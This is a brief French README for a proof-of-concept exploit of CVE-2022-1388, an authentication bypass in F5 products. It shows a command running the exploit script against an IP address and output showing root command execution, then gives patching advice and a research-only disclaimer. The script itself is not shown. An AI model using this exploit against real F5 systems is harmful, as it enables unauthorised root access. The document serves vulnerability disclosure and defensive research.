
PoC pour CVE-2022-1388
POC pour CVE-2022-1388 affectant plusieurs produits F5.
Une analyse technique des causes profondes de la vulnérabilité est disponible sur notre blog : https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Conditions nécessaires d'une requête pour exploiter cette vulnérabilité :
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Mettez à jour vers la dernière version ou atténuez en suivant les instructions du bulletin de sécurité F5
Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.